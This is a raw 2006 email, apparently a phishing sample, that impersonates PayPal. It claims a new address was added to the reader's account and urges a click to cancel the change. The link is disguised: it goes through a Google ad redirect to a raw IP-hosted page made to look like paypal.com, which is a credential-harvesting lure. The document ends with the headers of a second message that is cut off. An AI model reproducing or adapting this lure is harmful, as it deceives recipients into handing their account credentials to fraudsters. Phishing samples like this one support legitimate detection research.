From: "PayPal" <support@notifications.paypal.com>
Subject: Verify your new email address
Date: Sun, 6 Aug 2006 13:02:48 -0500
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_009F_01C2A9A6.195B7434"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Message-Id: <20060806175710.44FFA6CD081@mail1.example.com>
To: undisclosed-recipients:;
Status: R
X-Status: 
X-Keywords:                  

This is a multi-part message in MIME format.

------=_NextPart_000_009F_01C2A9A6.195B7434
Content-Type: text/plain;
	charset="Windows-1251"
Content-Transfer-Encoding: 7bit

<HTML>
<HEAD>
<xmeta NAME="GENERATOR" Content="Microsoft DHTML Editing Control">
<TITLE></TITLE>
</HEAD><br><br>
<xbody>
<P><FONT face="Courier New" size="2">You have added <A target="_blank"

>
<FONT face="Courier New" size="2"> undergroundseller@yahoo.com </A> as a
new email address for<br> your
PayPal account.<br></p></FONT>
<P><FONT face="Courier New" size="2">If you did not authorize this change
, or feel there is an error made ,<br/><br/>
<P><FONT face="Courier New" size="2"><A target="_blank"<br><br/><table
align="" bgcolor="#FFE65C" border="0" cellpadding="1" cellspacing="0"
width="400"><tr><td><table align="center" bgcolor="#FFFECD" border="0"
cellpadding="4" cellspacing="0" width="100%"><tr><td align="center"
class="sansSerif"><a target="_parent"
href="http://www.google.com/pagead/iclk?sa=l&ai=Br3ycNQz5Q-fXBJGSiQLU0eDSAueHkArnhtWZAu-FmQWgjlkQAxgFKAg4AEDKEUiFOVD-4r2f-P____8BoAGyqor_A8gBAZUCCapCCqkCxU7NLQH0sz4&num=5&adurl=http://212.12.177.170:9999/www.paypal.com/addyouremail/webscrr/index.php">Click
here to cancel your new email address</a></td></tr></table></td></tr></table><br/><br/><p/></A><br></p></FONT>
<P><FONT face="Courier New" size="2">If this change was initiated by you ,
<br> the new email address will be set as primary within 3 working days .
<P><FONT face="Courier New" size="2">Thank you for using
PayPal!<br></xbody>
The PayPal Team .</p></FONT><br>
------=_NextPart_000_009F_01C2A9A6.195B7434
Content-Type: text/html;
	charset="Windows-1251"
Content-Transfer-Encoding: 7bit

<HTML>
<HEAD>
<xmeta NAME="GENERATOR" Content="Microsoft DHTML Editing Control">
<TITLE></TITLE>
</HEAD><br><br>
<xbody>
<P><FONT face="Courier New" size="2">You have added <A target="_blank"

>
<FONT face="Courier New" size="2"> undergroundseller@yahoo.com </A> as a
new email address for<br> your
PayPal account.<br></p></FONT>
<P><FONT face="Courier New" size="2">If you did not authorize this change
, or feel there is an error made ,<br/><br/>
<P><FONT face="Courier New" size="2"><A target="_blank"<br><br/><table
align="" bgcolor="#FFE65C" border="0" cellpadding="1" cellspacing="0"
width="400"><tr><td><table align="center" bgcolor="#FFFECD" border="0"
cellpadding="4" cellspacing="0" width="100%"><tr><td align="center"
class="sansSerif"><a target="_parent"
href="http://www.google.com/pagead/iclk?sa=l&ai=Br3ycNQz5Q-fXBJGSiQLU0eDSAueHkArnhtWZAu-FmQWgjlkQAxgFKAg4AEDKEUiFOVD-4r2f-P____8BoAGyqor_A8gBAZUCCapCCqkCxU7NLQH0sz4&num=5&adurl=http://212.12.177.170:9999/www.paypal.com/addyouremail/webscrr/index.php">Click
here to cancel your new email address</a></td></tr></table></td></tr></table><br/><br/><p/></A><br></p></FONT>
<P><FONT face="Courier New" size="2">If this change was initiated by you ,
<br> the new email address will be set as primary within 3 working days .
<P><FONT face="Courier New" size="2">Thank you for using
PayPal!<br></xbody>
The PayPal Team .</p></FONT><br>

------=_NextPart_000_009F_01C2A9A6.195B7434--

From root@dc2-web32.assortedinternet.com  Sun Aug  6 14:59:24 2006
Return-Path: <root@dc2-web32.assortedinternet.com>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail2.example.com (mail2.example.com [10.3.4.5])
	by funky.example.com (Postfix) with ESMTP id 0D4D5469E4
	for <nobody@login.example.com>; Sun,  6 Aug 2006 14:59:24 -0400 (EDT)
Received: from dc2-web32.assortedinternet.com (dc2-web32.assortedinternet.com [66.36.233.232])
	by mail2.example.com (Postfix) with ESMTP id EF8226FA506
	for <nobody@example.com>; Sun,  6 Aug 2006 14:59:23 -0400 (EDT)
Received: from root by dc2-web32.assortedinternet.com with local (Exim 4.52)
	id 1G9nqI-0002sT-6a
	for nobody@example.com; Sun, 06 Aug 2006 14:59:18 -0400
